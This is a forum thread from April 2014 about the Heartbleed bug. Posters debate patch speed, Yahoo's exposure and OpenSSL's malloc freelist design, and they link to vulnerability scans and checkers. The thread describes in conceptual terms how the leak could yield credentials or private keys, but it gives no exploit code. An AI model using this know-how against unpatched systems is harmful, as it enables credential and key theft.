Heartbleed Openssl Bug

That is such a bullshit statement.

“Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.”

Most normal companies have a 3 year life cycle max and regular software maintenance/patching as part of vulnerability management.

It’s not like other companies haven’t gotten caught in similar situations its happened to Microsoft, Apple, and everyone else numerous times.

I figured with all the talent Yahoo has sitting around they would come up with some quick mitigation however it was vulnerable for an extremely long amount of time yesterday. It’s likely 100,000+ users have had credentials compromised if not more.

Well, I know that RHEL 5 and CentOS 5 are unaffected due to still running OpenSSL 0.9.8. RHEL 5 is still in support and will be for some time. 3 year life cycles work for some companies with large budgets, but I’m guessing that there are MANY companies out there still running OpenSSL 0.9.8.

I agree it’s a bullshit statement though. Saying, “we’re awesome because we’re running old software” is the biggest cop-out on the planet and in the bigger picture, you’re in worse shape than the companies affected by heartbleed.

The amount of time it took to get a mitigation in place was my primary issue.

Running outdated software and accepting the risk while having mitigating controls is fine.

You could yank out hundreds of yahoo logins in a couple min from mail.yahoo.com yesterday and that is with 0 skill. If someone was more skilled they could use a memory leak like this to defeat a number of exploit mitigation techniques if they already had working exploit for code apache or other software.

Sorry your open source software failed you.

agreed

this is kind-of a bummer to the open source community, but it was patched and released downstream VERY quickly.

This is just how things happen in open source communities and was pretty awesome if you think about it. How long do proprietary bugs take to get patched? A lot longer. People are complaining about this and aren’t realizing that software like this is free and actually works pretty awesome for a response to address this.

So apparently you can hit people client side with this.

agreed, 100%

If you read the bug, you can hit anyone, even program that use OpenSSL if they implement the heartbeat. The app dumps memory in 64k chunks so you essentially can capture application keys and data, even Bitcoin private keys from wallets.

      • Updated - - -

For the technical folk, this bug is really interesting.

http://thread.gmane.org/gmane.os.openbsd.misc/211952/focus=211963

> On Tue, Apr 08, 2014 at 15:09, Mike Small wrote:
> > nobody <openbsd.as.a.desktop <at> gmail.com> writes:
> >
> >> “read overrun, so ASLR won’t save you”
> >
> > What if malloc’s “G” option were turned on? You know, assuming the
> > subset of the worlds’ programs you use is good enough to run with that.
>
> No. OpenSSL has exploit mitigation countermeasures to make sure it’s
> exploitable.

What Ted is saying may sound like a joke…

So years ago we added exploit mitigations counter measures to libc
malloc and mmap, so that a variety of bugs can be exposed. Such
memory accesses will cause an immediate crash, or even a core dump,
then the bug can be analyed, and fixed forever.

Some other debugging toolkits get them too. To a large extent these
come with almost no performance cost.

But around that time OpenSSL adds a wrapper around malloc & free so
that the library will cache memory on it’s own, and not free it to the
protective malloc.

You can find the comment in their sources …

#ifndef OPENSSL_NO_BUF_FREELISTS
/* On some platforms, malloc() performance is bad enough that you can’t just

OH, because SOME platforms have slow performance, it means even if you
build protective technology into malloc() and free(), it will be
ineffective. On ALL PLATFORMS, because that option is the default,
and Ted’s tests show you can’t turn it off because they haven’t tested
without it in ages.

So then a bug shows up which leaks the content of memory mishandled by
that layer. If the memoory had been properly returned via free, it
would likely have been handed to munmap, and triggered a daemon crash
instead of leaking your keys.

OpenSSL is not developed by a responsible team.

I still don’t understand how they’re claiming fully recovery of private keys.

Just from messing around the memory that is being read in the heap isn’t near the private keys

Edit: http://blog.erratasec.com/2014/04/why-heartbleed-doesnt-leak-private-key.html#.U0XjDfldXdA

Yahoo has completed the patch to their whole portfolio.

https://help.yahoo.com/kb/SLN24021.html

How do you know if this effects you. I heard some sites arent effected.
Wonder if certain bank sites were effected/fixed it.
I called mine and they said they werent effected, but they could be lying to keep me happy

Great video

Seeing a lot of active exploitation attempts after getting IDS rules loaded into Snort…

https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt

http://filippo.io/Heartbleed/

Disclaimer: This scan was performed around April 8, 12:00 UTC. Websites listed
as vulnerable may no longer be vulnerable. This list serves as a snapshot of
vulnerable sites at the time of the scan.

Take the list with a grain of salt, it’s likely that a lot of patching has been done since then. The top 3 are all patched.

I still want to someone fully recover a complete private key from a web server with actual traffic

co-worker of mine had a good point, you’d have to exploit the server RIGHT as the httpd service is starting since that’s when the private key might be in that part of memory.

You might be able to get it when a process forks

It’s just odd some security people are running around say all these private keys are lost